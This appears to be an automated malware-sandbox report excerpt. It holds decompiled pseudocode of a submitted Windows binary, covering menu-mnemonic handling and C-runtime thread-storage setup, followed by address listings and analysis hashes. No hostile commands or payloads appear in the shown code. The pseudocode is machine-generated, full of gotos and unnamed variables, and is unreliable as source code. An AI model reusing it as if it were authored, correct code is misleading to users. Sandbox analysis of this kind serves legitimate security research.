                                                                                                                                                                                                                                                                                          							if(IsWindowEnabled( *(_t172 + 0x5c)) != 0) {
                                                                                                                                                                                                                                                                                          								_v148.top = 0;
                                                                                                                                                                                                                                                                                          								_v148.right = 0;
                                                                                                                                                                                                                                                                                          								_v148.bottom = 0;
                                                                                                                                                                                                                                                                                          								_t145 = 0;
                                                                                                                                                                                                                                                                                          								_v148.left = 0;
                                                                                                                                                                                                                                                                                          								GetClientRect( *(_t172 + 4),  &_v148);
                                                                                                                                                                                                                                                                                          								_v128 = 0;
                                                                                                                                                                                                                                                                                          								_v124 = 0;
                                                                                                                                                                                                                                                                                          								_v120 = 0;
                                                                                                                                                                                                                                                                                          								_v132 = 0;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t172 + 4), 0x41d, _v332,  &_v132);
                                                                                                                                                                                                                                                                                          								_t162 = _v332;
                                                                                                                                                                                                                                                                                          								_v164 = 0;
                                                                                                                                                                                                                                                                                          								_v160 = 0;
                                                                                                                                                                                                                                                                                          								_v156 = 0;
                                                                                                                                                                                                                                                                                          								_v152 = 0;
                                                                                                                                                                                                                                                                                          								_v168 = 0;
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t172 + 4), 0x417, _v332,  &_v168);
                                                                                                                                                                                                                                                                                          								_t110 = _v160;
                                                                                                                                                                                                                                                                                          								if((_t110 & 0x00000004) == 0 || (_t110 & 0x00000008) != 0 || _v124 > _v148.right) {
                                                                                                                                                                                                                                                                                          									MessageBeep(_t145);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t112 =  *(_t172 + 0x85);
                                                                                                                                                                                                                                                                                          									if((_t112 & 0x00000002) != 0 && (_t112 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                          										 *(_t172 + 0x85) = _t112 | 0x00000008;
                                                                                                                                                                                                                                                                                          										E00101600(1, _t172);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									E00101540(_t172);
                                                                                                                                                                                                                                                                                          									_t162 =  *(_t172 + 4);
                                                                                                                                                                                                                                                                                          									PostMessageA( *(_t172 + 4), 0x100, 0x28, _t145);
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t172 + 4), 0x448, _v332, _t145);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_t145 = _t97;
                                                                                                                                                                                                                                                                                          							PostMessageA( *(_t172 + 4), 0x448, 0xffffffff, _t97);
                                                                                                                                                                                                                                                                                          							E00101570(_t172, SendMessageA);
                                                                                                                                                                                                                                                                                          							if(_a4 == 0x2f && E00101120(_t172) != 0) {
                                                                                                                                                                                                                                                                                          								 *_t145 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L47:
                                                                                                                                                                                                                                                                                          						_pop(_t169);
                                                                                                                                                                                                                                                                                          						return E001059E6(_v336, _t145, _v8 ^ _t173, _t162, _t169, _t172);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t162 = _t147 >> 0x10;
                                                                                                                                                                                                                                                                                          					if(_t147 >> 0x10 != 0x10) {
                                                                                                                                                                                                                                                                                          						if(_t95 != 0) {
                                                                                                                                                                                                                                                                                          							goto L47;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L34;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t125 = GetMenuItemCount(_t167);
                                                                                                                                                                                                                                                                                          					_t145 = 0;
                                                                                                                                                                                                                                                                                          					_v344 = _t125;
                                                                                                                                                                                                                                                                                          					_v332 = 2;
                                                                                                                                                                                                                                                                                          					_v340 = 0;
                                                                                                                                                                                                                                                                                          					_v325 = 0;
                                                                                                                                                                                                                                                                                          					if(_t125 <= 0) {
                                                                                                                                                                                                                                                                                          						goto L47;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                                                                          						_t144 = _v324.dwMajorVersion;
                                                                                                                                                                                                                                                                                          						if(_t144 >= 5 || _t144 == 4 && _v324.dwMinorVersion >= 0x5a) {
                                                                                                                                                                                                                                                                                          							L13:
                                                                                                                                                                                                                                                                                          							_v404.cch = 0x64;
                                                                                                                                                                                                                                                                                          							_v404.fMask = 0x3f;
                                                                                                                                                                                                                                                                                          							_v404.dwTypeData =  &_v116;
                                                                                                                                                                                                                                                                                          							if(GetMenuItemInfoA(_t167, _t145, 1,  &_v404) == 0 || (_v404.fType & 0x00000800) != 0) {
                                                                                                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                                                                                                          								_t145 = _t145 + 1;
                                                                                                                                                                                                                                                                                          								if(_t145 < _v344) {
                                                                                                                                                                                                                                                                                          									_t167 = _v352;
                                                                                                                                                                                                                                                                                          									L8:
                                                                                                                                                                                                                                                                                          									E00106820( &_v404, 0, 0x30);
                                                                                                                                                                                                                                                                                          									_v404.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          									E00106820( &(_v324.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          									_t174 = _t174 + 0x18;
                                                                                                                                                                                                                                                                                          									_t162 =  &_v324;
                                                                                                                                                                                                                                                                                          									_v324.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          									if(GetVersionExA( &_v324) == 0) {
                                                                                                                                                                                                                                                                                          										goto L12;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t139 = _v404.dwItemData;
                                                                                                                                                                                                                                                                                          								if(_t139 == 0 ||  *_t139 != 0x1313) {
                                                                                                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t140 =  *(_t139 + 4);
                                                                                                                                                                                                                                                                                          									if(_t140 == 0) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t159 =  *_t140;
                                                                                                                                                                                                                                                                                          									if(_t159 == 0) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									while(_t159 != 0x26) {
                                                                                                                                                                                                                                                                                          										_t140 = CharNextA(_t140);
                                                                                                                                                                                                                                                                                          										_t159 =  *_t140;
                                                                                                                                                                                                                                                                                          										if(_t159 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if( *_t140 == 0) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t162 = _t140[1];
                                                                                                                                                                                                                                                                                          									_v356 = CharLowerA(_a4 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          									if(CharLowerA(_t140[1] & 0x0000ffff) != _v356) {
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if(_v325 != 0) {
                                                                                                                                                                                                                                                                                          										_v332 = 3;
                                                                                                                                                                                                                                                                                          										L29:
                                                                                                                                                                                                                                                                                          										if(_v325 != 0) {
                                                                                                                                                                                                                                                                                          											_t170 = _v332;
                                                                                                                                                                                                                                                                                          											if(_t170 == 2) {
                                                                                                                                                                                                                                                                                          												PostMessageA( *(_t172 + 4), 0x448, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          												E00101570(_t172, _t170);
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t162 = _v340 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          											 *_v348 = 1;
                                                                                                                                                                                                                                                                                          											_v336 = (_t170 & 0x0000ffff) << 0x00000010 | _v340 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L47;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t162 = _t145 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          										_v340 = _t145 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          										_v325 = 1;
                                                                                                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                                                                                                          						_v404.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v336 = 0;
                                                                                                                                                                                                                                                                                          				if(_t147 != 0xd) {
                                                                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x000fe8c9
                                                                                                                                                                                                                                                                                          0x000fe8d0
                                                                                                                                                                                                                                                                                          0x000fe8d4
                                                                                                                                                                                                                                                                                          0x000fe8d8
                                                                                                                                                                                                                                                                                          0x000fe8da
                                                                                                                                                                                                                                                                                          0x000fe8dd
                                                                                                                                                                                                                                                                                          0x000fe8e9
                                                                                                                                                                                                                                                                                          0x000fe8ec
                                                                                                                                                                                                                                                                                          0x000fe8ee
                                                                                                                                                                                                                                                                                          0x000fe8f4
                                                                                                                                                                                                                                                                                          0x000fe8fa
                                                                                                                                                                                                                                                                                          0x000fe90c
                                                                                                                                                                                                                                                                                          0x000fe90c
                                                                                                                                                                                                                                                                                          0x000fe916
                                                                                                                                                                                                                                                                                          0x000fe918
                                                                                                                                                                                                                                                                                          0x000feb0d
                                                                                                                                                                                                                                                                                          0x000feb0d
                                                                                                                                                                                                                                                                                          0x000feb27
                                                                                                                                                                                                                                                                                          0x000feb31
                                                                                                                                                                                                                                                                                          0x000feb35
                                                                                                                                                                                                                                                                                          0x000feb81
                                                                                                                                                                                                                                                                                          0x000feb8f
                                                                                                                                                                                                                                                                                          0x000feb95
                                                                                                                                                                                                                                                                                          0x000feb9b
                                                                                                                                                                                                                                                                                          0x000feba5
                                                                                                                                                                                                                                                                                          0x000feba8
                                                                                                                                                                                                                                                                                          0x000febae
                                                                                                                                                                                                                                                                                          0x000febc1
                                                                                                                                                                                                                                                                                          0x000febc4
                                                                                                                                                                                                                                                                                          0x000febc7
                                                                                                                                                                                                                                                                                          0x000febd3
                                                                                                                                                                                                                                                                                          0x000febd6
                                                                                                                                                                                                                                                                                          0x000febd8
                                                                                                                                                                                                                                                                                          0x000febe8
                                                                                                                                                                                                                                                                                          0x000febee
                                                                                                                                                                                                                                                                                          0x000febf4
                                                                                                                                                                                                                                                                                          0x000febfa
                                                                                                                                                                                                                                                                                          0x000fec09
                                                                                                                                                                                                                                                                                          0x000fec0f
                                                                                                                                                                                                                                                                                          0x000fec11
                                                                                                                                                                                                                                                                                          0x000fec19
                                                                                                                                                                                                                                                                                          0x000fec74
                                                                                                                                                                                                                                                                                          0x000fec2a
                                                                                                                                                                                                                                                                                          0x000fec2a
                                                                                                                                                                                                                                                                                          0x000fec32
                                                                                                                                                                                                                                                                                          0x000fec3a
                                                                                                                                                                                                                                                                                          0x000fec42
                                                                                                                                                                                                                                                                                          0x000fec42
                                                                                                                                                                                                                                                                                          0x000fec47
                                                                                                                                                                                                                                                                                          0x000fec4c
                                                                                                                                                                                                                                                                                          0x000fec58
                                                                                                                                                                                                                                                                                          0x000fec6f
                                                                                                                                                                                                                                                                                          0x000fec6f
                                                                                                                                                                                                                                                                                          0x000fec19
                                                                                                                                                                                                                                                                                          0x000feb37
                                                                                                                                                                                                                                                                                          0x000feb3a
                                                                                                                                                                                                                                                                                          0x000feb45
                                                                                                                                                                                                                                                                                          0x000feb4d
                                                                                                                                                                                                                                                                                          0x000feb56
                                                                                                                                                                                                                                                                                          0x000feb6a
                                                                                                                                                                                                                                                                                          0x000feb6a
                                                                                                                                                                                                                                                                                          0x000feb56
                                                                                                                                                                                                                                                                                          0x000fec7a
                                                                                                                                                                                                                                                                                          0x000fec83
                                                                                                                                                                                                                                                                                          0x000fec90
                                                                                                                                                                                                                                                                                          0x000fec90
                                                                                                                                                                                                                                                                                          0x000fe920
                                                                                                                                                                                                                                                                                          0x000fe926
                                                                                                                                                                                                                                                                                          0x000feb07
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000feb07
                                                                                                                                                                                                                                                                                          0x000fe92d
                                                                                                                                                                                                                                                                                          0x000fe933
                                                                                                                                                                                                                                                                                          0x000fe935
                                                                                                                                                                                                                                                                                          0x000fe93b
                                                                                                                                                                                                                                                                                          0x000fe945
                                                                                                                                                                                                                                                                                          0x000fe94b
                                                                                                                                                                                                                                                                                          0x000fe953
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe959
                                                                                                                                                                                                                                                                                          0x000fe959
                                                                                                                                                                                                                                                                                          0x000fe9b4
                                                                                                                                                                                                                                                                                          0x000fe9b4
                                                                                                                                                                                                                                                                                          0x000fe9bd
                                                                                                                                                                                                                                                                                          0x000fe9d7
                                                                                                                                                                                                                                                                                          0x000fe9e5
                                                                                                                                                                                                                                                                                          0x000fe9ef
                                                                                                                                                                                                                                                                                          0x000fe9f9
                                                                                                                                                                                                                                                                                          0x000fea07
                                                                                                                                                                                                                                                                                          0x000fea94
                                                                                                                                                                                                                                                                                          0x000fea94
                                                                                                                                                                                                                                                                                          0x000fea9b
                                                                                                                                                                                                                                                                                          0x000fe960
                                                                                                                                                                                                                                                                                          0x000fe966
                                                                                                                                                                                                                                                                                          0x000fe971
                                                                                                                                                                                                                                                                                          0x000fe987
                                                                                                                                                                                                                                                                                          0x000fe991
                                                                                                                                                                                                                                                                                          0x000fe996
                                                                                                                                                                                                                                                                                          0x000fe999
                                                                                                                                                                                                                                                                                          0x000fe9a0
                                                                                                                                                                                                                                                                                          0x000fe9b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe9b2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea19
                                                                                                                                                                                                                                                                                          0x000fea19
                                                                                                                                                                                                                                                                                          0x000fea21
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea2b
                                                                                                                                                                                                                                                                                          0x000fea2b
                                                                                                                                                                                                                                                                                          0x000fea30
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea32
                                                                                                                                                                                                                                                                                          0x000fea36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea38
                                                                                                                                                                                                                                                                                          0x000fea3e
                                                                                                                                                                                                                                                                                          0x000fea44
                                                                                                                                                                                                                                                                                          0x000fea48
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea4a
                                                                                                                                                                                                                                                                                          0x000fea48
                                                                                                                                                                                                                                                                                          0x000fea4f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea51
                                                                                                                                                                                                                                                                                          0x000fea67
                                                                                                                                                                                                                                                                                          0x000fea79
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea82
                                                                                                                                                                                                                                                                                          0x000feaa3
                                                                                                                                                                                                                                                                                          0x000feaad
                                                                                                                                                                                                                                                                                          0x000feab4
                                                                                                                                                                                                                                                                                          0x000feaba
                                                                                                                                                                                                                                                                                          0x000feac3
                                                                                                                                                                                                                                                                                          0x000fead2
                                                                                                                                                                                                                                                                                          0x000feada
                                                                                                                                                                                                                                                                                          0x000feada
                                                                                                                                                                                                                                                                                          0x000feadf
                                                                                                                                                                                                                                                                                          0x000feaf4
                                                                                                                                                                                                                                                                                          0x000feafa
                                                                                                                                                                                                                                                                                          0x000feafa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea84
                                                                                                                                                                                                                                                                                          0x000fea84
                                                                                                                                                                                                                                                                                          0x000fea87
                                                                                                                                                                                                                                                                                          0x000fea8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fea8d
                                                                                                                                                                                                                                                                                          0x000fea82
                                                                                                                                                                                                                                                                                          0x000fea21
                                                                                                                                                                                                                                                                                          0x000fea07
                                                                                                                                                                                                                                                                                          0x000fe9cd
                                                                                                                                                                                                                                                                                          0x000fe9cd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe9cd
                                                                                                                                                                                                                                                                                          0x000fe953
                                                                                                                                                                                                                                                                                          0x000fe8fc
                                                                                                                                                                                                                                                                                          0x000fe90a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ItemMenu_memset$CharCountInfoMessageNextPostVersion
                                                                                                                                                                                                                                                                                          • String ID: ,$/$?$Z$d
                                                                                                                                                                                                                                                                                          • API String ID: 3606643131-2349203295
                                                                                                                                                                                                                                                                                          • Opcode ID: cbdbea2ac9d08d964f2839429f13de26b3dd2e90dcab4dcd124fc748e4443346
                                                                                                                                                                                                                                                                                          • Instruction ID: 4cd36b32f0993047be477f8d5584b0805e422debccca8861cddcbe995f9cf8ae
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbdbea2ac9d08d964f2839429f13de26b3dd2e90dcab4dcd124fc748e4443346
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62A15EB09042589FDB71CF24CC84BEEBBF4BF49700F108099E649A76A1D7B49A81DF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                          			E001076B6(void* __ebx) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t7;
                                                                                                                                                                                                                                                                                          				long _t10;
                                                                                                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                                          				intOrPtr _t21;
                                                                                                                                                                                                                                                                                          				long _t26;
                                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t35;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t30 = __ebx;
                                                                                                                                                                                                                                                                                          				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          					 *0x170ff0 = GetProcAddress(_t35, "FlsAlloc");
                                                                                                                                                                                                                                                                                          					 *0x170ff4 = GetProcAddress(_t35, "FlsGetValue");
                                                                                                                                                                                                                                                                                          					 *0x170ff8 = GetProcAddress(_t35, "FlsSetValue");
                                                                                                                                                                                                                                                                                          					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                                                                                                                                                                                                                          					__eflags =  *0x170ff0;
                                                                                                                                                                                                                                                                                          					_t39 = TlsSetValue;
                                                                                                                                                                                                                                                                                          					 *0x170ffc = _t7;
                                                                                                                                                                                                                                                                                          					if( *0x170ff0 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						 *0x170ff4 = TlsGetValue;
                                                                                                                                                                                                                                                                                          						 *0x170ff0 = E001073C6;
                                                                                                                                                                                                                                                                                          						 *0x170ff8 = _t39;
                                                                                                                                                                                                                                                                                          						 *0x170ffc = TlsFree;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						__eflags =  *0x170ff4;
                                                                                                                                                                                                                                                                                          						if( *0x170ff4 == 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							__eflags =  *0x170ff8;
                                                                                                                                                                                                                                                                                          							if( *0x170ff8 == 0) {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags = _t7;
                                                                                                                                                                                                                                                                                          								if(_t7 == 0) {
                                                                                                                                                                                                                                                                                          									goto L6;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t10 = TlsAlloc();
                                                                                                                                                                                                                                                                                          					 *0x1597e0 = _t10;
                                                                                                                                                                                                                                                                                          					__eflags = _t10 - 0xffffffff;
                                                                                                                                                                                                                                                                                          					if(_t10 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                                                                                          						_t11 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t12 = TlsSetValue(_t10,  *0x170ff4);
                                                                                                                                                                                                                                                                                          						__eflags = _t12;
                                                                                                                                                                                                                                                                                          						if(_t12 == 0) {
                                                                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							E0010845F();
                                                                                                                                                                                                                                                                                          							_t41 = __imp__EncodePointer;
                                                                                                                                                                                                                                                                                          							_t14 =  *_t41( *0x170ff0);
                                                                                                                                                                                                                                                                                          							 *0x170ff0 = _t14;
                                                                                                                                                                                                                                                                                          							_t15 =  *_t41( *0x170ff4);
                                                                                                                                                                                                                                                                                          							 *0x170ff4 = _t15;
                                                                                                                                                                                                                                                                                          							_t16 =  *_t41( *0x170ff8);
                                                                                                                                                                                                                                                                                          							 *0x170ff8 = _t16;
                                                                                                                                                                                                                                                                                          							 *0x170ffc =  *_t41( *0x170ffc);
                                                                                                                                                                                                                                                                                          							_t18 = E0010A504();
                                                                                                                                                                                                                                                                                          							__eflags = _t18;
                                                                                                                                                                                                                                                                                          							if(_t18 == 0) {
                                                                                                                                                                                                                                                                                          								L14:
                                                                                                                                                                                                                                                                                          								E00107403();
                                                                                                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t36 = __imp__DecodePointer;
                                                                                                                                                                                                                                                                                          								_t21 =  *((intOrPtr*)( *_t36()))( *0x170ff0, E00107587);
                                                                                                                                                                                                                                                                                          								 *0x1597dc = _t21;
                                                                                                                                                                                                                                                                                          								__eflags = _t21 - 0xffffffff;
                                                                                                                                                                                                                                                                                          								if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          									goto L14;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t42 = E00109194(1, 0x214);
                                                                                                                                                                                                                                                                                          									__eflags = _t42;
                                                                                                                                                                                                                                                                                          									if(_t42 == 0) {
                                                                                                                                                                                                                                                                                          										goto L14;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)( *_t36()))( *0x170ff8,  *0x1597dc, _t42);
                                                                                                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          											goto L14;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_push(0);
                                                                                                                                                                                                                                                                                          											_push(_t42);
                                                                                                                                                                                                                                                                                          											E00107440(_t30, _t36, _t42, __eflags);
                                                                                                                                                                                                                                                                                          											_t26 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                                                                                                                                                          											 *_t42 = _t26;
                                                                                                                                                                                                                                                                                          											_t11 = 1;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return _t11;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E00107403();
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x001076b6
                                                                                                                                                                                                                                                                                          0x001076c4
                                                                                                                                                                                                                                                                                          0x001076c8
                                                                                                                                                                                                                                                                                          0x001076e8
                                                                                                                                                                                                                                                                                          0x001076f5
                                                                                                                                                                                                                                                                                          0x00107702
                                                                                                                                                                                                                                                                                          0x00107707
                                                                                                                                                                                                                                                                                          0x00107709
                                                                                                                                                                                                                                                                                          0x00107710
                                                                                                                                                                                                                                                                                          0x00107716
                                                                                                                                                                                                                                                                                          0x0010771b
                                                                                                                                                                                                                                                                                          0x00107733
                                                                                                                                                                                                                                                                                          0x00107738
                                                                                                                                                                                                                                                                                          0x00107742
                                                                                                                                                                                                                                                                                          0x0010774c
                                                                                                                                                                                                                                                                                          0x00107752
                                                                                                                                                                                                                                                                                          0x0010771d
                                                                                                                                                                                                                                                                                          0x0010771d
                                                                                                                                                                                                                                                                                          0x00107724
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00107726
                                                                                                                                                                                                                                                                                          0x00107726
                                                                                                                                                                                                                                                                                          0x0010772d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010772f
                                                                                                                                                                                                                                                                                          0x0010772f
                                                                                                                                                                                                                                                                                          0x00107731
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00107731
                                                                                                                                                                                                                                                                                          0x0010772d
                                                                                                                                                                                                                                                                                          0x00107724
                                                                                                                                                                                                                                                                                          0x00107757
                                                                                                                                                                                                                                                                                          0x0010775d
                                                                                                                                                                                                                                                                                          0x00107762
                                                                                                                                                                                                                                                                                          0x00107765
                                                                                                                                                                                                                                                                                          0x0010782c
                                                                                                                                                                                                                                                                                          0x0010782c
                                                                                                                                                                                                                                                                                          0x0010782c
                                                                                                                                                                                                                                                                                          0x0010776b
                                                                                                                                                                                                                                                                                          0x00107772
                                                                                                                                                                                                                                                                                          0x00107774
                                                                                                                                                                                                                                                                                          0x00107776
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010777c
                                                                                                                                                                                                                                                                                          0x0010777c
